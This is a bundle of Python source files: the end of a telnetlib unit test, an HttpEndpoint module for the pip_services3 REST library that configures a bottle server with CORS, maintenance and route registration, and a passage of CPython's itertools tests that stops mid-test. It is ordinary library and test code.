nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
if __name__ == '__main__':
unittest.main()
|
HttpEndpoint.py
|
# -*- coding: utf-8 -*-
"""
pip_services3_rpc.services.HttpEndpoint
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Http endpoint implementation
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import json
import re
import time
from threading import Thread
from typing import List, Optional, Callable
import bottle
from beaker.middleware import SessionMiddleware
from bottle import request, response
from pip_services3_commons.config import IConfigurable, ConfigParams
from pip_services3_commons.errors import ConnectionException, ConfigException
from pip_services3_commons.refer import IReferenceable, IReferences
from pip_services3_commons.run import IOpenable
from pip_services3_commons.validate import Schema
from pip_services3_components.count import CompositeCounters
from pip_services3_components.log import CompositeLogger
from . import IRegisterable
from .HttpResponseSender import HttpResponseSender
from .SSLCherryPyServer import SSLCherryPyServer
from ..connect.HttpConnectionResolver import HttpConnectionResolver
class HttpEndpoint(IOpenable, IConfigurable, IReferenceable):
"""
    Used for creating HTTP endpoints. An endpoint is a URL at which a given service can be accessed by a client.
### Configuration parameters ###
Parameters to pass to the :func:`configure` method for component configuration:
- cors_headers - a comma-separated list of allowed CORS headers
- cors_origins - a comma-separated list of allowed CORS origins
- connection(s) - the connection resolver's connections;
- "connection.discovery_key" - the key to use for connection resolving in a discovery service;
- "connection.protocol" - the connection's protocol;
- "connection.host" - the target host;
- "connection.port" - the target port;
- "connection.uri" - the target URI.
- credential - the HTTPS credentials:
- "credential.ssl_key_file" - the SSL private key in PEM
- "credential.ssl_crt_file" - the SSL certificate in PEM
- "credential.ssl_ca_file" - the certificate authorities (root cerfiticates) in PEM
### References ###
A logger, counters, and a connection resolver can be referenced by passing the following references to the object's :func:`set_references` method:
- `*:logger:*:*:1.0` (optional) :class:`ILogger <pip_services3_components.log.ILogger.ILogger>` components to pass log messages
- `*:counters:*:*:1.0` (optional) :class:`ICounters <pip_services3_components.count.ICounters.ICounters>` components to pass collected measurements
- `*:discovery:*:*:1.0` (optional) :class:`IDiscovery <pip_services3_components.connect.IDiscovery.IDiscovery>` services to resolve connection
Example:
.. code-block:: python
def my_method(_config, _references):
endpoint = HttpEndpoint()
            if _config:
                endpoint.configure(_config)
            if _references:
                endpoint.set_references(_references)
            # ...
            endpoint.open(correlation_id)
# ...
"""
_default_config = ConfigParams.from_tuples("connection.protocol", "http",
"connection.host", "0.0.0.0",
"connection.port", 3000,
"credential.ssl_key_file", None,
"credential.ssl_crt_file", None,
"credential.ssl_ca_file", None,
"options.maintenance_enabled", False,
"options.request_max_size", 1024 * 1024,
"options.file_max_size", 200 * 1024 * 1024,
"connection.connect_timeout", 60000,
"connection.debug", True)
_debug = False
def __init__(self):
"""
Creates HttpEndpoint
"""
self.__service = None
self.__server = None
self.__maintenance_enabled: bool = False
self.__file_max_size = 200 * 1024 * 1024
self.__protocol_upgrade_enabled: bool = False
self.__uri: str = None
self.__connection_resolver: HttpConnectionResolver = HttpConnectionResolver()
self.__logger: CompositeLogger = CompositeLogger()
self.__counters: CompositeCounters = CompositeCounters()
self.__registrations: List[IRegisterable] = []
self.__allowed_headers: List[str] = ["correlation_id"]
self.__allowed_origins: List[str] = []
def configure(self, config: ConfigParams):
"""
Configures this HttpEndpoint using the given configuration parameters.
- connection(s) - the connection resolver's connections;
- "connection.discovery_key" - the key to use for connection resolving in a discovery service;
- "connection.protocol" - the connection's protocol;
- "connection.host" - the target host;
- "connection.port" - the target port;
- "connection.uri" - the target URI.
:param config: configuration parameters, containing a "connection(s)" section.
"""
config = config.set_defaults(self._default_config)
self.__connection_resolver.configure(config)
bottle.BaseRequest.MEMFILE_MAX = config.get_as_long('options.request_max_size')
self.__file_max_size = config.get_as_long_with_default('options.file_max_size', self.__file_max_size)
self.__maintenance_enabled = config.get_as_boolean_with_default('options.maintenance_enabled',
self.__maintenance_enabled)
self.__protocol_upgrade_enabled = config.get_as_boolean_with_default('options.protocol_upgrade_enabled',
self.__protocol_upgrade_enabled)
self._debug = config.get_as_boolean_with_default('options.debug', self._debug)
headers = config.get_as_string_with_default("cors_headers", "").split(",")
for header in headers:
if header != '':
self.__allowed_headers = list(filter(lambda h: h != header, self.__allowed_headers))
self.__allowed_headers.append(header)
origins = config.get_as_string_with_default("cors_origins", "").split(',')
for origin in origins:
origin = origin.strip()
if origin != '':
self.__allowed_origins = list(filter(lambda h: h != origin, self.__allowed_origins))
self.__allowed_origins.append(origin)
def set_references(self, references: IReferences):
"""
Sets references to this endpoint's logger, counters, and connection resolver.
- *:logger:*:*:1.0 (optional) :class:`ILogger <pip_services3_components.log.ILogger.ILogger>` components to pass log messages
- *:counters:*:*:1.0 (optional) :class:`ICounters <pip_services3_components.count.ICounters.ICounters>` components to pass collected measurements
- *:discovery:*:*:1.0 (optional) :class:`IDiscovery <pip_services3_components.connect.IDiscovery.IDiscovery>` services to resolve connection
:param references: an IReferences object, containing references to a logger, counters, and a connection resolver.
"""
self.__logger.set_references(references)
self.__counters.set_references(references)
self.__connection_resolver.set_references(references)
def is_open(self) -> bool:
"""
Checks if the component is opened.
:return: whether or not this endpoint is open with an actively listening REST server.
"""
return not (self.__server is None)
def open(self, correlation_id: Optional[str]):
"""
Opens a connection using the parameters resolved by the referenced connection resolver and creates a REST server (service) using the set options and parameters.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
if self.is_open():
return
connection = self.__connection_resolver.resolve(correlation_id)
if connection is None:
raise ConfigException(correlation_id, "NO_CONNECTION", "Connection for REST client is not defined")
self.__uri = connection.get_as_string('uri')
# verify https with bottle
certfile = None
keyfile = None
if connection.get_as_string_with_default('protocol', 'http') == 'https':
certfile = connection.get_as_nullable_string('ssl_crt_file')
keyfile = connection.get_as_nullable_string('ssl_key_file')
# Create instance of bottle application
self.__service = SessionMiddleware(bottle.Bottle(catchall=True, autojson=True)).app
self.__service.config['catchall'] = True
self.__service.config['autojson'] = True
# Enable CORS requests
self.__service.add_hook('after_request', self.__enable_cors)
self.__service.add_hook('after_request', self.__do_maintance)
self.__service.add_hook('after_request', self.__no_cache)
self.__service.add_hook('before_request', self.__add_compatibility)
# Register routes
# self.__perform_registrations()
def start_server():
self.__service.run(server=self.__server, debug=self._debug)
# self.__perform_registrations()
host = connection.get_as_string('host')
port = connection.get_as_integer('port')
# Starting service
try:
self.__server = SSLCherryPyServer(host=host, port=port, certfile=certfile, keyfile=keyfile)
# Start server in thread
Thread(target=start_server, daemon=True).start()
            # Give the server thread a brief moment to start listening
            time.sleep(0.01)
self.__connection_resolver.register(correlation_id)
self.__logger.debug(correlation_id, f"Opened REST service at {self.__uri}", )
self.__perform_registrations()
except Exception as ex:
self.__server = None
raise ConnectionException(correlation_id, 'CANNOT_CONNECT', 'Opening REST service failed') \
.wrap(ex).with_details('url', self.__uri)
def close(self, correlation_id: Optional[str]):
"""
Closes this endpoint and the REST server (service) that was opened earlier.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
try:
if not (self.__server is None):
self.__server.shutdown()
self.__service.close()
self.__logger.debug(
correlation_id, f"Closed REST service at {self.__uri}")
self.__server = None
self.__service = None
self.__uri = None
except Exception as ex:
self.__logger.warn(correlation_id, "Failed while closing REST service: " + str(ex))
def register(self, registration: IRegisterable):
"""
Registers a registerable object for dynamic endpoint discovery.
:param registration: the registration to add.
"""
self.__registrations.append(registration)
def unregister(self, registration: IRegisterable):
"""
Unregisters a registerable object, so that it is no longer used in dynamic endpoint discovery.
:param registration: the registration to remove.
"""
self.__registrations.remove(registration)
def __perform_registrations(self):
for registration in self.__registrations:
registration.register()
def __fix_route(self, route: str) -> str:
if route is not None and len(route) > 0:
if route[0] != '/':
route = f'/{route}'
return route
return ''
def register_route(self, method: str, route: str, schema: Schema, handler: Callable):
"""
        Registers an action in this object's REST server (service) by the given method and route.
:param method: the HTTP method of the route.
:param route: the route to register in this object's REST server (service).
:param schema: the schema to use for parameter validation.
:param handler: the action to perform at the given route.
"""
method = method.upper()
# if method == 'DELETE':
# method = 'DEL'
route = self.__fix_route(route)
def wrapper(*args, **kwargs):
try:
if isinstance(schema, Schema):
params = self.__get_data() or {}
params.update(kwargs)
correlation_id = None if not params else params.get('correlation_id')
schema.validate_and_throw_exception(correlation_id, params, False)
return handler(*args, **kwargs)
except Exception as ex:
# hack the redirect response in bottle
if isinstance(ex, bottle.HTTPResponse):
handler(*args, **kwargs)
return HttpResponseSender.send_error(ex)
self.__service.route(route, method, wrapper)
def __get_data(self) -> Optional[dict]:
result = {}
if request.json or request.query:
for k, v in request.query.dict.items():
result[k] = ''.join(v)
if request.json is not None and request.json != 'null':
json_body = request.json if not isinstance(request.json, str) else json.loads(
request.json)
result.update({'body': json_body})
return result
else:
return None
def __enable_cors(self):
response.headers['Access-Control-Max-Age'] = '5'
response.headers['Access-Control-Allow-Origin'] = ', '.join(self.__allowed_origins)
response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'
response.headers[
'Access-Control-Allow-Headers'] = ', '.join(self.__allowed_headers)
def __do_maintance(self):
"""
        Responds with HTTP 503 and a Retry-After header when maintenance mode is enabled.
"""
# Make this more sophisticated
if self.__maintenance_enabled:
response.headers['Retry-After'] = 3600
response.status = 503
def __no_cache(self):
"""
Prevents IE from caching REST requests
"""
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = 0
def __add_compatibility(self):
def inner(name):
if request.query:
param = request.query[name]
if param:
return param
if request.body:
param = request.json[name]
if param:
return param
if request.params:
param = request.params[name]
if param:
return param
return None
request['param'] = inner
request['route'] = {'params': request.params}
def get_param(self, param, default=None):
return request.params.get(param, default)
def get_correlation_id(self) -> Optional[str]:
"""
Returns correlationId from request
:returns: Returns correlationId from request
"""
correlation_id = bottle.request.query.get('correlation_id')
if correlation_id is None or correlation_id == '':
correlation_id = bottle.request.headers.get('correlation_id')
return correlation_id
def register_route_with_auth(self, method: str, route: str, schema: Schema, authorize: Callable, action: Callable):
"""
        Registers an action with authorization in this object's REST server (service)
by the given method and route.
:param method: the HTTP method of the route.
:param route: the route to register in this object's REST server (service).
:param schema: the schema to use for parameter validation.
:param authorize: the authorization interceptor
:param action: the action to perform at the given route.
"""
def action_with_authorize(*args, **kwargs):
            # hack to pass the parameters to the authorizer
bottle.request.params['kwargs'] = kwargs
# bottle.request.params['args'] = args
authorize()
return next_action(*args, **kwargs)
if authorize:
next_action = action
action = action_with_authorize
self.register_route(method, route, schema, action)
def register_interceptor(self, route: str, action: Callable):
"""
Registers a middleware action for the given route.
:param route: the route to register in this object's REST server (service).
:param action: the middleware action to perform at the given route.
"""
route = self.__fix_route(route)
def intercept_handler():
match = re.match('.*' + route, request.url) is not None
if route is not None and route != '' and not match:
pass
else:
return action()
self.__service.add_hook('before_request', intercept_handler)
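# --- Editor's sketch (not part of the original module) -------------------------
# One plausible way to wire the pieces documented above: configure the endpoint,
# open it, and register a route dynamically. The port, route path, handler, and
# correlation id below are illustrative assumptions, not library defaults.
if __name__ == '__main__':
    def _demo_status_handler():
        # bottle serializes a returned dict to JSON
        return {'status': 'ok'}
    endpoint = HttpEndpoint()
    endpoint.configure(ConfigParams.from_tuples(
        'connection.protocol', 'http',
        'connection.host', '0.0.0.0',
        'connection.port', 8080))
    endpoint.open('demo-correlation-id')
    endpoint.register_route('GET', '/status', None, _demo_status_handler)
    try:
        time.sleep(5)  # keep the server alive briefly for a manual check
    finally:
        endpoint.close('demo-correlation-id')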
|
test_itertools.py
|
import unittest
from test import test_support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import sys
import operator
import random
import copy
import pickle
from functools import reduce
try:
import threading
except ImportError:
threading = None
maxsize = test_support.MAX_Py_ssize_t
minsize = -maxsize-1
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def next(self):
raise StopIteration
def take(n, seq):
    'Convenience function for partially consuming a long or infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
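# Editor's sketch (not part of the original suite): a standalone sanity check of the
# counting identities the tests below rely on, using the fact() helper defined above.
def _demo_counts(n=5, r=2):
    # C(n, r) combinations, P(n, r) permutations, and n**r products with repetition.
    assert len(list(combinations(range(n), r))) == fact(n) // fact(r) // fact(n - r)
    assert len(list(permutations(range(n), r))) == fact(n) // fact(n - r)
    assert len(list(product(range(n), repeat=r))) == n ** r
    return True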
class TestBasicOps(unittest.TestCase):
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
self.assertEqual(list(combinations('abc', 32)), []) # r > n
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = range(r)
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) // fact(r) // fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
                self.assertEqual(result, list(combinations3(values, r))) # matches third pure python version
@test_support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
self.assertEqual(list(cwr('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number items returned: (n+r-1)! / r! / (n-1)! when n>0
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) // fact(r) // fact(n-1)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
@test_support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = range(n)
cycles = range(n, n-r, -1)
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) // fact(n-r)) # right number of perms
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
@test_support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) // fact(r) // fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) // fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) // fact(r) // fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, filter(set(cwr).__contains__, perm)) # comb: perm that is a cwr
self.assertEqual(comb, filter(set(perm).__contains__, cwr)) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), range(6), range(6)) # too many args
def test_count(self):
self.assertEqual(zip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(zip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, zip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)), range(maxsize-5, maxsize+5))
self.assertEqual(take(10, count(-maxsize-5)), range(-maxsize-5, -maxsize+5))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
c.next()
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
c.next()
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxint-5, -sys.maxint+5 ,-10, -1, 0, 10, sys.maxint-5, sys.maxint+5):
# Test repr (ignoring the L in longs)
r1 = repr(count(i)).replace('L', '')
r2 = 'count(%r)'.__mod__(i).replace('L', '')
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, sys.maxint-5, sys.maxint+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(next(pickle.loads(pickle.dumps(c, proto))), value)
def test_count_with_stride(self):
self.assertEqual(zip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(zip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(zip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(zip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(zip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(zip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(zip('abc',count(2,1L)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(zip('abc',count(2,3L)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
range(10, 10+3*(maxsize+5), maxsize+5))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
self.assertEqual(repr(c), 'count(3, 5)')
c.next()
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
c.next()
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
c.next()
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values like 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxint-5, -sys.maxint+5 ,-10, -1, 0, 10, sys.maxint-5, sys.maxint+5):
for j in (-sys.maxint-5, -sys.maxint+5 ,-10, -1, 0, 1, 10, sys.maxint-5, sys.maxint+5):
# Test repr (ignoring the L in longs)
r1 = repr(count(i, j)).replace('L', '')
if j == 1:
r2 = ('count(%r)' % i).replace('L', '')
else:
r2 = ('count(%r, %r)' % (i, j)).replace('L', '')
